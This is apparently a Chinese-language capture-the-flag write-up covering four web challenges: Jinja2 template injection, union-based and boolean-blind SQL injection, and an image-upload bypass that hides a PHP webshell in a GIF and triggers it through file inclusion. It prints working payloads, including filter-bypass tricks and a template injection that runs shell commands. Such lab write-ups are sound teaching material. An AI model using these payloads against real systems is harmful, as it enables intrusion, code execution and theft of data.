秋季赛WP

一个人就是一支队伍

WEB

Easy-ssti

服务器模板注入，jinja2漏洞，{{7*7}}有回显说明有注入漏洞，_和[被过滤，用require函数结合attr绕过。
Jinja2模板参考
http://doc.yonyoucloud.com/doc/jinja2-docs-cn/templates.html#builtin-filters

注入语句：

{{lipsum|attr(request.args.a)|attr("get")(request.args.b)|attr("get")("e"+"val") (request.args.c)}}&a=globals&b=builtins&c=import("os").popen("cat /flag").read()

"e"+"val" ‘o’+’s’ “编码”.decode(‘base64’)绕过敏感字

Easy-sql1

常规的1’//or//1>0#和order by之后，经历一番绕过得出能运行的注入语句：

username=1'/**/union/**/(SeleCT/**/database(),2)#&password=

得到数据库名

因为=被过滤，不想麻烦绕过就直接爆出整个表名

username=1'/**/union/**/(SeleCT/**/group_concat(table_name),2/**/from/**/information_schema.tables)#&password=

查找到含flag的表名:flag_table_1

username=1'/**/union/**/(SeleCT/**/FLAG,2/**/from/**/flag_table_1)#&password=

得flag

Easy-ez_upload

用御剑扫描目录

访问/robot.txt

得文件上传地址,只允许图片上传。用一句话木马攻击，尝试各种方法都没法上传成php格式后,尝试图马。一开始直接把一句话木马写在图片末尾，上传后发现被过滤掉了，考虑二次渲染。网上说png、jpeg不好改，用gif改。用winhex对比原gif和二次渲染过的gif找出相同的字段，插入木马。

上传图片，木马没有被过滤，但图片还是以gif格式解析，蚁剑无法连接…卡了好久之后看原来黑屏的网页

明明有提示文件包含我却没看…

利用文件包含漏洞，使gif以php格式解析，访问

蚁剑终于连接成功

找不到flag文件，用命令行试试

找到flag

Medium-web4

布尔盲注，感觉出题人应该是个好人，所以猜测是同一个库，尝试题目sql1的注入语句

username=1'/**/union/**/(SeleCT/**/FLAG,2/**/from/**/flag_table_1)#&password=

回显是good，说明猜对了

username=1'or(length(database())>6)#&password=   good
username=1'or(length(database())>7)#&password=   try again

库名长度为7，猜应该是cumtctf，脚本爆破验证一下

没猜错，因为sql1的语句回显是good，猜测flag还是在flag_table_1

因为=被过滤，判断字符用<和>绕过

username=1'or(select(ascii(mid((select(flag)from(flag_table_1)limit/**/0,1),1,
1)))>0)%26%26(select(ascii(mid((select(flag)from(flag_table_1)limit/**/0,1),1,
1)))<125)#&password=

回显good，说明又猜对了，上脚本爆破得flag（脚本绕过语句存在注释符,所以和手注有区别，绕过空格不能用/**/,而用/!/），flag长度猜大一点